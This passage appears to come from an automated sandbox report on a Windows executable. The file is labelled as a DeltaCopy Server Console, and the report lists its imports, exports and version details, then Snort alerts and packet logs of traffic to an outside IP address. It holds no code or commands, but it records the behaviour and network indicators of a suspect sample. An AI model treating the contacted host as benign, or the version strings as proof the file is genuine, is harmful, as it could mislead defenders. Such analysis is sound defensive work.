RT_GROUP_CURSOR	0xe7c04	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c18	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c2c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c40	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c54	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c68	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xe7c7c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xe7c90	0x14	data	English	United States
RT_VERSION	0xe7ca4	0x2d8	data	English	United States
RT_MANIFEST	0xe7f7c	0x1fe	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.DLL	CloseServiceHandle, ControlService, CreateServiceA, OpenSCManagerA, OpenServiceA, QueryServiceStatus, RegCloseKey, RegCreateKeyExA, RegFlushKey, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, StartServiceA
KERNEL32.DLL	CloseHandle, CompareStringA, CreateDirectoryA, CreateEventA, CreateFileA, CreatePipe, CreateProcessA, CreateThread, DeleteCriticalSection, DeleteFileA, EnterCriticalSection, EnumCalendarInfoA, ExitProcess, FindClose, FindFirstFileA, FindResourceA, FormatMessageA, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetDateFormatA, GetDiskFreeSpaceA, GetEnvironmentStrings, GetExitCodeProcess, GetFileAttributesA, GetFileType, GetFullPathNameA, GetLastError, GetLocalTime, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetThreadLocale, GetTickCount, GetUserDefaultLCID, GetVersion, GetVersionExA, GlobalAddAtomA, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomA, GlobalFree, GlobalLock, GlobalUnlock, HeapAlloc, HeapFree, InitializeCriticalSection, InterlockedDecrement, InterlockedExchange, InterlockedIncrement, IsValidLocale, LCMapStringA, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadResource, LockResource, MulDiv, MultiByteToWideChar, RaiseException, ReadFile, ResetEvent, RtlUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetHandleCount, SetHandleInformation, SetLastError, SetThreadLocale, SizeofResource, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile, lstrcpyA, lstrcpynA, lstrlenA
VERSION.DLL	GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
COMCTL32.DLL	ImageList_Add, ImageList_BeginDrag, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_Write, _TrackMouseEvent, ImageList_Create
GDI32.DLL	BitBlt, CopyEnhMetaFileA, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, CreateDIBitmap, CreateFontIndirectA, CreateHalftonePalette, CreatePalette, CreatePenIndirect, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteObject, ExcludeClipRect, ExtTextOutA, GetBitmapBits, GetBrushOrgEx, GetClipBox, GetCurrentPositionEx, GetDCOrgEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetObjectA, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextExtentPoint32A, GetTextExtentPointA, GetTextMetricsA, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, PlayEnhMetaFile, Polyline, RealizePalette, RectVisible, Rectangle, RestoreDC, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetEnhMetaFileBits, SetPixel, SetROP2, SetStretchBltMode, SetTextColor, SetViewportOrgEx, SetWinMetaFileBits, SetWindowOrgEx, StretchBlt, UnrealizeObject
SHELL32.DLL	SHBrowseForFolderA, SHGetMalloc, ShellExecuteA, SHGetPathFromIDListA
USER32.DLL	ActivateKeyboardLayout, AdjustWindowRectEx, BeginPaint, CallNextHookEx, CallWindowProcA, CharLowerA, CharLowerBuffA, CharNextA, CharNextW, CharToOemA, CharUpperBuffA, CheckMenuItem, ClientToScreen, CloseClipboard, CreateIcon, CreateMenu, CreatePopupMenu, CreateWindowExA, DefFrameProcA, DefMDIChildProcA, DefWindowProcA, DeleteMenu, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextA, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndPaint, EnumChildWindows, EnumThreadWindows, EnumWindows, EqualRect, FillRect, FindWindowA, FrameRect, GetActiveWindow, GetCapture, GetClassInfoA, GetClassLongA, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextA, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameA, GetKeyboardState, GetKeyboardType, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoA, GetMenuState, GetMenuStringA, GetMessagePos, GetParent, GetPropA, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetTopWindow, GetWindow, GetWindowDC, GetWindowLongA, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextA, GetWindowThreadProcessId, InflateRect, InsertMenuA, InsertMenuItemA, IntersectRect, InvalidateRect, IsChild, IsDialogMessageA, IsDialogMessageW, IsIconic, IsRectEmpty, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapA, LoadCursorA, LoadIconA, LoadKeyboardLayoutA, LoadStringA, MapVirtualKeyA, MapWindowPoints, MessageBeep, MessageBoxA, OemToCharA, OffsetRect, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageA, PostQuitMessage, PtInRect, RedrawWindow, RegisterClassA, RegisterClipboardFormatA, RegisterWindowMessageA, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropA, ScreenToClient, ScrollWindow, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetClassLongA, SetClipboardData, SetCursor, SetFocus, SetForegroundWindow, SetMenu, SetMenuItemInfoA, SetParent, SetPropA, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongA, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextA, SetWindowsHookExA, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoA, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassA, UpdateWindow, WaitMessage, WindowFromPoint, wsprintfA, GetSystemMetrics
OLE32.DLL	CoInitialize, CoUninitialize
OLEAUT32.DLL	GetErrorInfo, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayUnaccessData, SysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeType, VariantClear, VariantCopy, VariantCopyInd, VariantInit

Exports

Name	Ordinal	Address
@@Consolerunner@Finalize	17	0x40bda8
@@Consolerunner@Initialize	16	0x40bd98
@@Dcconfig@Finalize	15	0x40af38
@@Dcconfig@Initialize	14	0x40af28
@@Genutils@Finalize	11	0x409df4
@@Genutils@Initialize	10	0x409de4
@@Installservice@Finalize	13	0x40a108
@@Installservice@Initialize	12	0x40a0f8
@@Logger@Finalize	7	0x407f18
@@Logger@Initialize	6	0x407f08
@@Mainformserver@Finalize	3	0x40709c
@@Mainformserver@Initialize	2	0x40708c
@@Rsyncconfigadapter@Finalize	9	0x409724
@@Rsyncconfigadapter@Initialize	8	0x409714
@@Servicestatus@Finalize	5	0x407ef8
@@Servicestatus@Initialize	4	0x407ee8
_AboutBox	21	0x4bfdfc
__GetExceptDLLinfo	1	0x401529
___CPPdebugHook	18	0x4b3098
_frmMainFormServer	19	0x4bfdd8
_frmServiceInstallParams	20	0x4bfdf0

Version Infos

Description	Data
LegalCopyright
InternalName
FileVersion	1.4.8.39
CompanyName	Synametrics Technologies
LegalTrademarks
Comments
ProductName
ProductVersion	1.4.0.0
FileDescription	DeltaCopy Server Console
OriginalFilename
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/30/21-18:07:06.601323	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49719	198.54.117.244	192.168.2.3
01/30/21-18:07:07.880098	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49722	198.54.117.244	192.168.2.3
01/30/21-18:07:08.591456	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49724	198.54.117.244	192.168.2.3
01/30/21-18:07:14.008676	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49725	198.54.117.244	192.168.2.3
01/30/21-18:07:14.619901	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49726	198.54.117.244	192.168.2.3
01/30/21-18:07:15.144808	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49727	198.54.117.244	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2021 18:07:06.210726976 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.403480053 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.403696060 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.406303883 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.599004030 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.601322889 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.601901054 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.796137094 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.796307087 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.490804911 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.683409929 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.683552027 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.685383081 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.878056049 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.880098104 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.880626917 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.073276997 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.073477983 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.197784901 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.390644073 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.390822887 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.394299984 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.589684963 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.591455936 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.592592955 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.785509109 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.785602093 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.616790056 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.811124086 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:13.812325954 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.813857079 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.006803989 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.008676052 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.009018898 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.177283049 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.202198982 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.202378035 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.381540060 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.382061958 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.412805080 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.617053032 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.619900942 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.620208025 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.755372047 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.824516058 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.824613094 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.948894978 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.949055910 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.949810982 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:15.142932892 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.144808054 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.145297050 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:15.338454008 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.338656902 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:20.990362883 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.184590101 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.187263012 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.187683105 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.380393982 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382164001 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382209063 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382245064 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382270098 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382303953 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382338047 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382364988 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.382447958 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382452965 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.382677078 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382715940 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382752895 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382836103 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575056076 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575086117 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575108051 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575130939 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575162888 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575184107 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575192928 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575206995 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575227976 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575247049 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575248957 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575315952 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575320959 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575335026 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575356007 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575366974 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575385094 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575428009 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575431108 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575443029 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575447083 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575457096 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575506926 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575506926 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575547934 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575568914 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575575113 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575586081 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575627089 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.767895937 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.767966032 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768026114 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768076897 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768085957 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768141985 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768146992 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768204927 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768260002 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768269062 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768313885 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768368006 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768372059 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768424988 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768484116 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768495083 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768548012 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768601894 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768605947 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768666029 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768721104 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768723965 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768840075 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.768948078 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.768979073 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769028902 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769085884 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769085884 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.769141912 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769195080 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.769202948 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769259930 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769310951 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769311905 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.769362926 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769434929 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.769582987 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769776106 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769839048 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.769876957 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769936085 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.769993067 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770004034 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770080090 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770107985 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770134926 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770164013 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770169020 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770183086 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770258904 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770306110 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770339012 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770361900 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770415068 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770416021 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770486116 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770543098 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770543098 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.770605087 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.770658016 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963314056 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963376045 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963418007 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963493109 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963548899 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963555098 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963606119 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963659048 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963663101 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963713884 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963716030 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963774920 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963778973 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963833094 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963886976 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963896036 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963941097 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.963993073 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.963995934 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964046955 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964097977 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964104891 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964155912 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964205980 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964220047 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964274883 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964324951 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964328051 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964382887 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964432955 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964437008 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964504004 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964557886 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964560032 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964608908 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964658976 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964672089 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964728117 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964777946 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964780092 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964833975 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964884043 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964886904 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964937925 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.964991093 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.964993954 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965044975 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965101004 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965105057 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965158939 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965208054 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965214014 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965269089 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965316057 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965322018 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965373993 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965428114 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965466976 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965533972 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965586901 CET	80	49728	198.54.117.244	192.168.2.3
